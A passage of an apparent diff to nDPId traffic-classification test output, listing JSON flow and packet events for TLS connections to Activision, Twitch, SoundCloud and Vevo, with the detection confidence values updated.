skylanders.com,*.sierragames.com,*.sekirothegame.com,*.ravensoftware.com,*.infinityward.com,*.highmoonstudios.com,*.highmoon.com,*.guitarhero.com,*.europeanwarzoneseries.com,*.demonware.net,*.crashbandicoot.com,*.callofdutyleague.com,*.callofdutyendowment.org,*.callofdutyendowment.com,*.callofduty.com,*.activisionretail.com,*.activisionblizzardmedia.com,*.activisionblizzard.com,*.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Santa Monica, O=Activision Publishing, Inc., CN=activision.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"F7:39:B4:E7:27:83:D4:55:8B:13:77:16:D5:8A:3E:77:FB:2A:4F:41"}} +00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482646628,"flow_last_seen":1646482646648,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482646648,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":327,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482646628,"flow_last_seen":1646482646665,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482646665,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +02301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646482646628,"flow_last_seen":1646482646669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5461,"flow_avg_l4_payload_len":780,"midstream":0,"thread_ts_msec":1646482646669,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","server_names":"www.benefitsforeveryworld.com,worldseriesofwarzone.com,treyarch.com,toysforbob.com,spyrothedragon.com,sledgehammergames.com,skylanders.com,sierragames.com,sekirothegame.com,ravensoftware.com,preview.demonware.net,infinityward.com,highmoonstudios.com,highmoon.com,guitarhero.com,europeanwarzoneseries.com,demonware.net,crashbandicoot.com,cdn.gh5.ps3.guitarhero.com,callofdutyleague.com,callofdutyendowment.org,callofdutyendowment.com,callofduty.com,benefitsforeveryworld.com,activisionretail.com,activisionblizzardmedia.com,activisionblizzard.com,activision.com,*.worldseriesofwarzone.com,*.treyarch.com,*.toysforbob.com,*.support.activision.com,*.spyrothedragon.com,*.sledgehammergames.com,*.skylanders.com,*.sierragames.com,*.sekirothegame.com,*.ravensoftware.com,*.infinityward.com,*.highmoonstudios.com,*.highmoon.com,*.guitarhero.com,*.europeanwarzoneseries.com,*.demonware.net,*.crashbandicoot.com,*.callofdutyleague.com,*.callofdutyendowment.org,*.callofdutyendowment.com,*.callofduty.com,*.activisionretail.com,*.activisionblizzardmedia.com,*.activisionblizzard.com,*.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Santa Monica, O=Activision Publishing, Inc., CN=activision.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"F7:39:B4:E7:27:83:D4:55:8B:13:77:16:D5:8A:3E:77:FB:2A:4F:41"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":333,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482659915,"flow_last_seen":1646482659915,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482659915,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1646482659915,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482659915,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8NwhAAEAGcJnAqAGAkks+p7QEAbuPD+ThAAAAAKAC+vAn\/AAAAgQFtAQCCAp9leqxAAAAAAEDAwc="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1646482659944,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482659944,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGrqGSSz6nwKgBgAG7tAQzgGmMjw\/k4qAS\/\/\/dhgAAAgQFTAQCCAr4JbCIfZXqsQEDAwk="} 01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1646482659945,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482659945,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5NwpAAEAGbprAqAGAkks+p7QEAbuPD+TiM4BpjYAYAfarGwAAAQEICn2V6s\/4JbCIFgMBAgABAAH8AwPVHsjDDxZ0MEuPnh4mVZQrYKtXYBQ9pfekL0WuWf4AwyAvTRXY5\/1xoex7GTddskZx0XzTM0eEKSDE8zjmPz09AAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA1ncWwudHdpdGNoLnR2ABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AICTuPjjZ\/cozh9y3b4u57OZ+NqRixmrA1oX4LnqMFUIxABcAQQTtWijAm0UTGHfpz\/ha9z62jseAV4wQoU798kRZvjxGrgocjEiYQtFtFEOacmIDo8c6dP4orndC+2JQqffkv\/gjACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":335,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482659915,"flow_last_seen":1646482659945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482659945,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gql.twitch.tv","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":336,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482659915,"flow_last_seen":1646482659961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482659961,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.3","client_requested_server_name":"gql.twitch.tv","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":335,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482659915,"flow_last_seen":1646482659945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482659945,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gql.twitch.tv","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":336,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482659915,"flow_last_seen":1646482659961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482659961,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.3","client_requested_server_name":"gql.twitch.tv","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482686914,"flow_last_seen":1646482686914,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482686914,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":45936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1646482686914,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482686914,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8RWlAAEAGOjfAqAGA0FUonrNwAFCsdkxQAAAAAKAC+vAqmQAAAgQFtAQCCArNau1nAAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1646482687080,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482687080,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8\/\/dAAPAGz6fQVSiewKgBgABQs3Db1RKprHZMUaASOQif4AAAAgQFtAEDAwAEAggKWgQEFM1q7Wc="} @@ -102,53 +102,53 @@ 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1646482724450,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482724450,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8sa9AAEAG8DvAqAGAEkLEZspeAbv+oP0DAAAAAKAC+vBIlQAAAgQFtAQCCAqQpxNDAAAAAAEDAwc="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1646482724458,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482724458,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8e2QAAPYGsIYSQsRmwKgBgAG7yl4LcBoC\/qD9BKAS\/\/+NCwAAAgQFoAQCCAqOOgLQkKcTQwEDAwg="} 01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1646482724464,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482724464,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5sbFAAEAG7jzAqAGAEkLEZspeAbv+oP0EC3AaA4AYAfbA9QAAAQEICpCnE1COOgLQFgMBAgABAAH8AwM6K+sImNx3dIej3yQBfsHlSQyH5l4F8hLKFYurrt+jPCCUv6qySiadEZg7Gj4\/vX5jrLg\/JYOIeoxWa\/ahTy7RDQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAATABEAAA5zb3VuZGNsb3VkLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACDq1odYnjLE9YoHd\/igeLWhv14ukLQSyf98ZPyHkQn7OgAXAEEEKYWpJR9uHJSJZBwzi1pAC8cLX9iNXc5VMFPlSgV8HHXqYbwegIwyfo36+y7oUVZIFeBilQuBs9gLF4NzHajtKwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00891{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482724450,"flow_last_seen":1646482724464,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482724464,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"soundcloud.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00932{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":342,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482724450,"flow_last_seen":1646482724472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482724472,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.3","client_requested_server_name":"soundcloud.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00891{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482724450,"flow_last_seen":1646482724464,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482724464,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"soundcloud.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00932{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":342,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482724450,"flow_last_seen":1646482724472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482724472,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.3","client_requested_server_name":"soundcloud.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482734324,"flow_last_seen":1646482734324,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482734324,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1646482734324,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482734324,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8YZNAAEAGvz7AqAGAl2XAXNyUAbtdgP2MAAAAAKAC+vB5pwAAAgQFtAQCCArbJaT6AAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1646482734331,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482734331,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGJ9KXZcBcwKgBgAG73JRRJl9LXYD9jaAS\/\/87kQAAAgQFTAQCCArq9J312yWk+gEDAwk="} 01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1646482734334,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482734334,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5YZVAAEAGvT\/AqAGAl2XAXNyUAbtdgP2NUSZfTIAYAfZOkQAAAQEICtslpQXq9J31FgMBAgABAAH8AwNzr2vzd\/QT\/aDhJiSq61v58duBBGwTUq6z8fAzWLEV5CDNfOfaUUVYVfXW\/CDKtRAJ+tVWWsbZK9mMfW2g+Km+ogAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAANAAsAAAh2ZXZvLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACCPQyH3d70yPXK9aVtEdAPnRA9ZC5WTB071dNPYc9Y+CAAXAEEEeVVr0wfghCvKk8pB3rwr9lMyYYYxB1YwkLSYt9F3bwDqNkUCdiLkyXAxOw3adrfDZNG4HFWPlbGmWIPel1Si6AArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482734324,"flow_last_seen":1646482734334,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482734334,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vevo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":346,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482734324,"flow_last_seen":1646482734350,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482734350,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vevo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01479{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":348,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482734324,"flow_last_seen":1646482734350,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4125,"flow_avg_l4_payload_len":687,"midstream":0,"thread_ts_msec":1646482734350,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vevo","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vevo.com","server_names":"*.cache.vevo.com,*.cache.vevodev.com,*.cache.vevoprd.com,*.cache.vevostg.com,*.vevodev.com,*.vevoprd.com,*.vevostg.com,stg.vevo.ly,vevo.com,vevo.ly,vevo.pl,vevo.tv,vevoapi.com,vevocdn.com,vevolive.tv,vevosubmit.com,www.vevo.ly,www.vevo.pl,*.vevo.com,*.vevo.ly,*.vevo.pl,*.vevo.tv,*.vevoapi.com,*.vevocdn.com,*.vevolive.tv,*.vevosubmit.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 